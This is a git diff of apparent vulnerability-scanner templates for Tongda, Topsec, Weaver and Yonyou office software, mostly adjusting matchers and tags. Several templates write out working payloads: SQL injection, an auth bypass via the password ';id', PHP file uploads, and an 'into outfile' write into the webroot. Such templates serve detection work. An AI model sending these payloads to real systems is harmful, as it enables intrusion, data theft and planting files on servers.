--- a/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml
+++ b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml
@@ -13,7 +13,7 @@ info:
     max-request: 1
     verified: true
     fofa-query: app="TDXK-通达OA"
-  tags: tongda,fileupload,intrusive
+  tags: tongda,fileupload,intrusive,router
 
 variables:
   num: "999999999"
@@ -59,6 +59,7 @@ http:
     matchers-condition: and
     matchers:
       - type: word
+        part: body_2
         words:
           - '{{md5(num)}}'
 
diff --git a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml
index 0cb10d5fbd..afb03e3809 100755
--- a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml
+++ b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml
@@ -23,15 +23,24 @@ http:
 
         title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
 
+      - |
+        POST /general/document/index.php/recv/register/insert HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))>128,1,710)))# =1&_SERVER=
+
     matchers-condition: and
     matchers:
       - type: word
-        part: header
+        part: header_1
         words:
           - "PHPSESSID="
           - "register_for/?rid="
         condition: and
 
-      - type: status
-        status:
-          - 302
\ No newline at end of file
+      - type: word
+        part: header_2
+        words:
+          - "register_for/?rid="
+        negative: true
\ No newline at end of file
diff --git a/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml b/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml
deleted file mode 100755
index 6c8589bc4d..0000000000
--- a/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: topsec-topapplb-arbitrary-login
-
-info:
-  name: Topsec TopAppLB Any account Login - Arbitrary Login
-  author: SleepingBag945
-  severity: high
-  description: |
-    Any Account can log in to the background.Enter any account on the login page, the password is ;id
-  reference:
-    - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json  
-  metadata:
-    max-request: 1
-    fofa-query: title="TopApp-LB 负载均衡系统"
-  tags: topsec,topapplb,misconfig
-
-http:
-  - raw:
-      - |
-        POST /login_check.php  HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-        Sec-Fetch-Site: same-origin
-        Sec-Fetch-Mode: navigate
-        Sec-Fetch-User: ?1
-        Sec-Fetch-Dest: document
-        Accept-Encoding: gzip, deflate
-        Accept-Language: zh-CN,zh;q=0.9
-
-        userName=admin&password=%3Bid
-
-    matchers:
-      - type: dsl
-        dsl:
-          - 'status_code_1 == 302 && contains(header_1,"redirect.php")'
-        condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml b/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml
index fae8bd88a8..3b9fdb9b40 100755
--- a/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml
+++ b/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml
@@ -7,7 +7,7 @@ info:
   description: |
     Topsec TopAppLB is vulnerable to authetication bypass .Enter any account on the login page, the password is `;id`.
   reference:
-    - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json  
+    - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json
   metadata:
     max-request: 1
     verified: true
@@ -24,7 +24,7 @@ http:
         userName=admin&password=%3Bid
 
       - |
-        GET /  HTTP/1.1
+        GET / HTTP/1.1
         Host: {{Hostname}}
 
     cookie-reuse: true
diff --git a/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml b/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml
index 51231848eb..f765502cec 100755
--- a/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml
+++ b/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml
@@ -23,7 +23,7 @@ http:
 
         
         ]>        
+        ]>
         &xxe;
 
     matchers-condition: and
diff --git a/http/vulnerabilities/weaver/weaver-e-cology-verifyquicklogin-arbitrary-login.yaml b/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml
similarity index 72%
rename from http/vulnerabilities/weaver/weaver-e-cology-verifyquicklogin-arbitrary-login.yaml
rename to http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml
index 9812101f1c..2e5f3a1e1f 100755
--- a/http/vulnerabilities/weaver/weaver-e-cology-verifyquicklogin-arbitrary-login.yaml
+++ b/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml
@@ -1,15 +1,15 @@
-id: weaver-e-cology-verifyquicklogin-arbitrary-login
+id: ecology-verifyquicklogin-auth-bypass
 
 info:
-  name: weaver e-cology verifyquicklogin.jsp arbitrarylogin
+  name: Weaver e-cology verifyquicklogin.jsp - Auth Bypass
   author: SleepingBag945
   severity: high
-  description: 泛微OA E-Cology VerifyQuickLogin.jsp文件中存在任意管理员登录漏洞,攻击者通过发送特殊的请求包可以获取管理员Session
+  description: There is an arbitrary administrator login vulnerability in the Panwei OA E-Cology VerifyQuickLogin.jsp file. An attacker can obtain the administrator Session by sending a special request package.
   reference:
     - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html
   metadata:
     fofa-query: app="泛微-协同办公OA"
-  tags: ecology,weaver,oa
+  tags: ecology,weaver,oa,auth-bypass
 
 http:
   - raw:
@@ -23,19 +23,18 @@ http:
 
         identifier=1&language=1&ipaddress=x.x.x.x
 
-
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
           - "\"sessionkey\":"
+
       - type: word
         part: body
         words:
           - "\"message\":"
+
       - type: status
         status:
-          - 200
-
-# Enhanced by md on 2022/10/31
+          - 200
\ No newline at end of file
diff --git a/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml
index e0a26a518d..a7bf35dcfc 100755
--- a/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml
@@ -1,34 +1,34 @@
 id: weaver-e-cology-validate-sqli
 
 info:
-  name: weaver-e-cology-validate-sqli
+  name: Weaver e-cology Validate.JSP - SQL Injection
   author: SleepingBag945
   severity: high
-  description: 泛微e-cology OA系统的validate.jsp文件中,因为对参数capitalid过滤不严,可致使SQL注入漏洞。攻击者运用该漏洞,可在未授权的情况下,远程发送精心构造的SQL语句,从而取得数据库敏感信息。
-  tags: ecology,weaver,oa,sqli
+  description: |
+    In the validate.jsp file of the Panwei e-cology OA system, the parameter capitalid is not strictly filtered, which can lead to SQL injection vulnerabilities. An attacker can use this vulnerability to remotely send carefully constructed SQL statements without authorization, thereby obtaining sensitive database information.
+  tags: ecology,weaver,sqli
+
+variables:
+  num1: "{{rand_int(40000, 44800)}}"
+  num2: "{{rand_int(40000, 44800)}}"
+  result: "{{to_number(num1)*to_number(num2)}}"
 
 http:
   - raw:
       - |
         POST /cpt/manage/validate.jsp?sourcestring=validateNum HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
-        Accept: */*
         Content-Type: application/x-www-form-urlencoded
-        Accept-Encoding: gzip
 
-        sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str(9039*926)&capitalnum=-10
-                        
+        sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str({{num1}}*{{num2}})&capitalnum=-10
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "8370114"
+          - "{{result}}"
+
       - type: status
         status:
-          - 200
-
-# Enhanced by md on 2022/10/31
-# select%20password%20as%20id%20from%20HrmResourceManager 解密后可登录
\ No newline at end of file
+          - 200
\ No newline at end of file
diff --git a/http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml b/http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml
index 1e63c77915..0f620f1e92 100644
--- a/http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml
+++ b/http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml
@@ -39,7 +39,15 @@ http:
     matchers-condition: and
     matchers:
       - type: dsl
-        dsl: 
+        dsl:
           - status_code == 200
           - contains(body,'Windows IP Configuration')
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+          - "text/html"
+        negative: true
         condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml b/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml
index 4a34c16335..ee7fd28463 100644
--- a/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml
+++ b/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml
@@ -35,7 +35,7 @@ http:
     skip-variables-check: true
     matchers:
       - type: dsl
-        dsl: 
+        dsl:
           - "status_code_1 == 200 && contains_all(body_1,'id', 'filepath') && !contains(tolower(body), 'status\":\"error')"
           - "status_code_2 == 200 && contains(header_2, 'filename=')"
           - "contains(body_2, 'Program Files') || regex('root:.*:0:0:', body)"
diff --git a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
index a852d8407d..203a8ba0b0 100755
--- a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
@@ -21,8 +21,8 @@ variables:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
-      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version"
+  #    - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql="
 
     stop-at-first-match: true
     matchers:
diff --git a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
index 37c185a222..b1b7a7bf2f 100755
--- a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
@@ -17,7 +17,7 @@ info:
 
 variables:
   filename: "{{to_lower(rand_base(5))}}"
-  payload: "[group]:[1]|[groupid]:[1 union select '',2,3,4,5,6,7,8 into outfile '../webroot/{{filename}}.php']"
+  payload: "[group]:[1]|[groupid]:[1 union select '',2,3,4,5,6,7,8 into outfile '../webroot/{{filename}}.php']"
 
 http:
   - raw:
@@ -35,9 +35,7 @@ http:
       - type: word
         part: body_2
         words:
-          - "PHP Version"
-          - "PHP Extension"
-        condition: and
+          - "758058d8987e7a9ec723bcdbec6c407e"
 
       - type: status
         status:
diff --git a/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml
index 901bd23ef0..c64cb2adf5 100755
--- a/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml
@@ -51,7 +51,7 @@ http:
     matchers-condition: and
     matchers:
       - type: dsl
-        dsl: 
+        dsl:
           - "status_code_1 == 200"
           - "status_code_3 == 200 && contains(body_3,'{{string}}')"
-        condition: and
+        condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml
index ded95bff68..aa034a39c5 100755
--- a/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml
@@ -43,7 +43,7 @@ http:
     matchers-condition: and
     matchers:
       - type: dsl
-        dsl: 
+        dsl:
           - "status_code_1 == 200 && contains_all(body_1,'original', 'SUCCESS')"
           - "contains(body_2, '{{result}}') && status_code_2 == 200"
         condition: and
diff --git a/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml b/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
index 46aea1864c..f8665fcc3d 100755
--- a/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
@@ -10,7 +10,7 @@ info:
     max-request: 1
     fofa-query: app="泛微-EOffice"
     verified: true
-  tags: weaver,e-office,oa,instrusive,rce
+  tags: weaver,e-office,intrusive,rce,file-upload
 
 variables:
   filename: "{{to_lower(rand_base(5))}}"
@@ -59,7 +59,7 @@ http:
     matchers-condition: and
     matchers:
       - type: dsl
-        dsl: 
+        dsl:
           - "status_code_1 == 200"
           - "contains(body_2, 'attachmentID') && contains(body_2, 'attachmentName')"
           - "status_code_3 == 200 && contains(body_3,'{{randstr}}')"
diff --git a/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml b/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml
index 965c468ad5..a9c42554d5 100644
--- a/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml
+++ b/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml
@@ -33,7 +33,7 @@ http:
     matchers-condition: and
     matchers:
       - type: dsl
-        dsl: 
+        dsl:
           - "status_code_1 == 200 && contains(body_1,'{{timestamp}}')"
           - "status_code_2 == 200 && contains(body_2,'新建')"
-        condition: and
+        condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
index a9090fb0cf..26a4134b10 100755
--- a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
@@ -1,7 +1,7 @@
 id: weaver-office-server-file-upload
 
 info:
-  name: OA E-Office OfficeServer.php Arbitrary File Upload 
+  name: OA E-Office OfficeServer.php Arbitrary File Upload
   author: SleepingBag945
   severity: critical
   description: |
@@ -12,7 +12,7 @@ info:
     max-request: 1
     fofa-query: app="泛微-EOffice"
     verified: true
-  tags: weaver,e-office,oa,rce,intrusive,file-upload
+  tags: weaver,e-office,oa,rce,intrusive,fileupload
 
 variables:
   filename: "{{to_lower(rand_base(5))}}"
@@ -31,9 +31,7 @@ http:
         Content-Disposition: form-data;name="FileData";filename="{{filename}}.php"
         Content-Type: application/octet-stream
 
-        <?php
-        phpinfo();
-        ?>
+        <?php echo md5(weaver);?>'
 
         ------WebKitFormBoundaryLpoiBFy4ANA8daew
         Content-Disposition: form-data;name="FormData"
@@ -50,9 +48,7 @@ http:
       - type: word
         part: body_2
         words:
-          - "PHP Version"
-          - "PHP Extension"
-        condition: and
+          - "758058d8987e7a9ec723bcdbec6c407e"
 
       - type: status
         status:
diff --git a/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml b/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml
index c3017184b9..cc50a7c997 100755
--- a/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml
+++ b/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml
@@ -24,8 +24,8 @@ http:
       - type: word
         part: body
         words:
-          - "datapassword"
-          - "datauser"
+          - "datapassword ="
+          - "datauser ="
         condition: and
 
       - type: status
diff --git a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
index b34c91983f..c5ffdcbcc3 100755
--- a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
@@ -44,7 +44,7 @@ http:
     matchers-condition: and
     matchers:
       - type: dsl
-        dsl: 
+        dsl:
           - "status_code_1 == 200"
           - "contains(body_2, 'imageSrc') && contains(body_2, 'height')"
           - "status_code_3 == 200 && contains(body_3,'{{randstr}}')"
diff --git a/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml
index 51647b3a29..c9ae09300c 100755
--- a/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml
@@ -11,7 +11,7 @@ info:
     - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-oa-workrelate-file-upload.yaml
   metadata:
     fofa-query: app="泛微-协同办公OA"
-  tags: ecology,upload,fileupload,intrusive
+  tags: ecology,fileupload,intrusive
 
 variables:
   filename: "{{to_lower(rand_base(5))}}"
@@ -65,12 +65,12 @@ http:
         internal: true
         group: 1
         regex:
-          - "&fileid=(.*?)\'>"
+          - "&fileid=(.*?)\\'>"
 
     matchers-condition: and
     matchers:
       - type: dsl
-        dsl: 
+        dsl:
           - "status_code_1 == 200 && contains(body_1,'workrelate/plan/util/ViewDoc')"
           - "status_code_2 == 200 && contains(body_2, 'println')"
           - "status_code_3 == 200 && contains(body_3,'{{string}}')"
diff --git a/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml b/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml
index 7bf1c2d19c..eda14230b5 100755
--- a/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml
+++ b/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml
@@ -9,7 +9,7 @@ info:
   reference: |
     - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
   metadata:
-    max-request: 2  
+    max-request: 2
     fofa-query: body="远程通CHANJET_Remote"
     verified: true
   tags: yonyou,chanjet,sqli
diff --git a/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml
index 876afbcecc..cd227fa523 100755
--- a/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml
@@ -12,7 +12,7 @@ info:
     max-request: 1
     fofa-query: app="用友-UFIDA-NC"
     verified: true
-  tags: yonyou,fileupload,intrusive
+  tags: yonyou,file-upload,intrusive
 
 variables:
   file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"
diff --git a/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml b/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml
index 07588ff47c..4a8f9d142f 100755
--- a/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml
@@ -9,6 +9,11 @@ info:
     - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
   tags: yonyou,grp,xxe,sqli
 
+variables:
+  num1: "{{rand_int(800000, 999999)}}"
+  num2: "{{rand_int(800000, 999999)}}"
+  result: "{{to_number(num1)*to_number(num2)}}"
+
 http:
   - raw:
       - |
@@ -17,13 +22,14 @@ http:
         Content-Type: application/x-www-form-urlencoded
         Accept-Encoding: gzip
 
